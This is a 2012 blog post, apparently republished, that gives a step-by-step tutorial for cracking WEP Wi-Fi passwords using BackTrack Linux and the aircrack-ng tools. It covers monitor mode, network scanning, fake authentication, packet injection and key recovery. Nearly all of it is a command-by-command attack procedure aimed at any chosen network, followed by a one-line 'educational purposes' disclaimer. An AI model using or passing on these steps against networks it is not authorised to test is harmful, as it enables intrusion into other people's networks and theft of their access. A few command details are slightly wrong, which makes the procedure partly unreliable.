Tech Magazine

How To Hack Wireless

Posted on the 08 February 2012 by Skateroren @ProgramsAlive
Download Backtrack from this website: http://www.backtrack-linux.org
Use Imageburn to make a boot-able disc:  http://www.imgburn.com
or  use Unetbootin to make a boot-able flash drive: http://unetbootin.sourceforge.net/
After you finish the following steps above restart your computer, enter the BIOS and change the boot order depending on whether you made a CD or a boot-able flash drive.
To start backtrack type in this command: Startx
Cracking Wep
Step 1: Open up a konsole, the first thing you want to do is start up networking type in this command:
/etc/init.d/networking start
Step 2: Check the name of your wireless card:
airmon-ng
Step 3: at this point you need to put your wireless card into monitor mode:
enter this to stop wireless card: airmon-ng stop [wireless card name]
enter this to start monitor mode: airmon-ng start [wireless card name]
enter this to see the changes: airmon-ng
at this point you dont want to use the original wireless card name anymore, use the one that starts with 'mon'.
Step 4: Now its time to scan, associate,authenticate, and inject packets into network.
enter this to scan networks: airodump-ng [wireless card name] , press ctrl + c when you find target.
write down the bssid, essid, and channel # because you will need them later on. remember the security for that network must be WEP.
To associate network with adaptor enter this:
airodump-ng -w wep -c [channel number] -bssid [Bssid number] [wireless card name]
Open up a new konsole.
enter this to authenticate connection: aireplay-ng -1 0 -a [bssid] [wireless card name]
Open up another konsole.
enter this to inject packets: aireplay-ng -3 -b [bssid][wireless card name]
Go back to the first konsole and pay attention to the 'Data' colum, you want that number to be 30,000 or more. after it reaches that point go back to the konsole thats sending packets and hold ctrl + c to stop.
type this in to see this files on your root directory: dir
look for a file that ends with .cap.
type this in to decrypt file and get the password: aircrack-ng [filename]
It should say key found, just remove the ":" and thats the password.
note: this is to show how vulnerable WEP is and is solely for educational purposes.

Back to Featured Articles on Logo Paperblog